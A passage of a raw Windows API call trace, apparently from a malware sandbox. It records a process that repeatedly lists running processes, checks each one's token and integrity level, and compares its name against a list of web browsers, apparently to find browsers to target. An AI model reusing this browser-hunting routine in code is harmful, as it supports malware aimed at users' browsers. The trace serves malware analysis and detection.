TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0538.937] GetLastError () returned 0x7a [0538.937] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0538.937] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0538.937] CloseHandle (hObject=0x29c) returned 1 [0538.937] CloseHandle (hObject=0x298) returned 1 [0538.938] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0538.938] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0538.938] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0538.938] GetLastError () returned 0x7a [0538.938] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0538.938] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0538.938] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0538.938] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0538.938] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0538.938] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0538.939] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0538.939] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0538.939] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0538.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0538.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0538.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0538.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0538.939] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0538.939] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0538.939] GetLastError () returned 0x7a [0538.940] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0538.940] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0538.940] CloseHandle (hObject=0x29c) returned 1 [0538.940] CloseHandle (hObject=0x298) returned 1 [0538.940] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0538.940] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0538.940] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0538.940] GetLastError () returned 0x7a [0538.941] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0538.941] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0538.941] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0538.941] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0538.941] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0538.941] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0538.941] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0538.941] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0538.941] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0538.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0538.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0538.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0538.942] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0538.943] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0540.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa7f0) returned 0xc0000004 [0540.953] VirtualAlloc (lpAddress=0x0, dwSize=0xb7f0, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0540.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb7f0, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0540.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0540.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0540.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0540.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0540.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0540.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0540.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0540.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0540.955] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0540.956] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0540.956] GetLastError () returned 0x7a [0540.956] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0540.956] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0540.956] CloseHandle (hObject=0x29c) returned 1 [0540.956] CloseHandle (hObject=0x298) returned 1 [0540.956] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0540.956] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0540.956] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0540.956] GetLastError () returned 0x7a [0540.956] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0540.956] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0540.956] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0540.956] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0540.957] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0540.957] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0540.957] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0540.957] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0540.957] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0540.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0540.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0540.957] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0540.957] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0540.957] GetLastError () returned 0x7a [0540.957] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0540.957] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0540.957] CloseHandle (hObject=0x29c) returned 1 [0540.957] CloseHandle (hObject=0x298) returned 1 [0540.957] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0540.957] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0540.958] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0540.958] GetLastError () returned 0x7a [0540.958] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0540.958] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0540.958] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0540.958] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0540.958] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0540.958] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0540.958] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0540.958] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0540.958] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0540.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0540.958] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0540.958] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0540.958] GetLastError () returned 0x7a [0540.958] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0540.958] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0540.959] CloseHandle (hObject=0x29c) returned 1 [0540.959] CloseHandle (hObject=0x298) returned 1 [0540.959] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0540.959] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0540.959] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0540.959] GetLastError () returned 0x7a [0540.959] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0540.959] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0540.959] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0540.959] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0540.959] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0540.959] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0540.959] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0540.959] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0540.959] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0540.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0540.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0540.960] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0540.960] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0540.960] GetLastError () returned 0x7a [0540.960] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0540.960] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0540.960] CloseHandle (hObject=0x29c) returned 1 [0540.960] CloseHandle (hObject=0x298) returned 1 [0540.960] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0540.960] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0540.960] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0540.960] GetLastError () returned 0x7a [0540.960] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0540.960] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0540.960] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0540.961] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0540.961] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0540.961] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0540.961] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0540.961] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0540.961] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0540.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0540.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0540.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0540.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0540.961] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0540.961] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0540.961] GetLastError () returned 0x7a [0540.961] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0540.961] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0540.961] CloseHandle (hObject=0x29c) returned 1 [0540.962] CloseHandle (hObject=0x298) returned 1 [0540.962] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0540.962] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0540.962] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0540.962] GetLastError () returned 0x7a [0540.962] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0540.962] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0540.962] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0540.962] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0540.962] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0540.962] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0540.962] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0540.962] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0540.962] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0540.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0540.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0540.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0540.963] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0540.963] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0542.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa4f8) returned 0xc0000004 [0542.966] VirtualAlloc (lpAddress=0x0, dwSize=0xb4f8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0542.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb4f8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0542.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0542.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0542.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0542.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0542.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0542.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0542.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0542.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0542.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0542.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0542.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0542.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0542.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0542.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0542.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0542.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0542.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0542.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0542.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 